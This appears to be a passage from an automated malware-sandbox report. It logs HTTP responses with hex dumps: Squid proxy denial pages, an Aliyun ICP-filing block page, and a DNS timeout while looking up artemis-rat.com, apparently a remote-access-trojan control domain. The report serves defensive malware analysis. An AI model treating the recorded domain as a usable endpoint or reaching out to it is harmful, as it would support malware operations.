3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/5.7Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:15:21 GMTContent-Type: text/html;charset=utf-8Content-Length: 3628X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from lb1X-Cache-Lookup: NONE from lb1:3128Via: 1.1 lb1 (squid/5.7)Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/5.7Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:15:23 GMTContent-Type: text/html;charset=utf-8Content-Length: 3628X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from lb1X-Cache-Lookup: NONE from lb1:3128Via: 1.1 lb1 (squid/5.7)Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/3.5.28Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:15:27 GMTContent-Type: text/html;charset=utf-8Content-Length: 952X-Squid-Error: ERR_ACCESS_DENIED 0Content-Language: enX-Cache: MISS from ah_testVia: 1.1 ah_test (squid/3.5.28)Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 41 65 72 6f 68 69 76 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 57 65 62 20 50 61 67 65 20 42 6c 6f 63 6b 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 0a 0a 62 6f 64 79 0a 3a 6c 61 6e 67 28 66 61 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 30 25 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 52 6f 79 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 20 7d 0a 3a 6c 61 6e 67 28 68 65 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 7d 0a 20 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 69 64 3d 22 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 22 3e 0a 3c 64 69 76 20 69 64 3d 22 74 69 74 6c 65 73 22 3e 0a 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 35 62 38 63 62 64 3b 22 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 61 6e 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 70 3e 41 63 63 65 73 73 20 74 6f 20 74 68 65 20 77 65 62 20 70 61 67 65 20 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 74 68 65 20 6e 65 74 77 6f 72 6b 20 70 6f 6c 69 63 79 2e 20 49 66 20 79 6f 75 20 62 65 6c 69 65 76 65 20 74 68 69 73 20 69 73 20 61 6e 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 55 52 4c 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 22 3e 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 3c 2f 61 3e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 43 61 74 65 67 6f 72 79 3a 20 3c 2f 70 3e 0a 3c 62 72 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 22 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 22 3e 47 65 6e 65 72 61 74 65 64 20 53
Source: global traffic	HTTP traffic detected: HTTP/1.1 503 Service Unavailable
Source: global traffic	HTTP traffic detected: HTTP/1.1 503 Service UnavailableContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Sat, 09 Mar 2024 12:15:43 GMTContent-Length: 102Data Raw: 64 69 61 6c 20 74 63 70 3a 20 6c 6f 6f 6b 75 70 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 6f 6e 20 31 2e 31 2e 31 2e 31 3a 35 33 3a 20 72 65 61 64 20 75 64 70 20 31 30 2e 36 34 2e 32 33 38 2e 32 31 36 3a 35 30 35 37 38 2d 3e 31 2e 31 2e 31 2e 31 3a 35 33 3a 20 69 2f 6f 20 74 69 6d 65 6f 75 74 0a Data Ascii: dial tcp: lookup artemis-rat.com on 1.1.1.1:53: read udp 10.64.238.216:50578->1.1.1.1:53: i/o timeout
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; 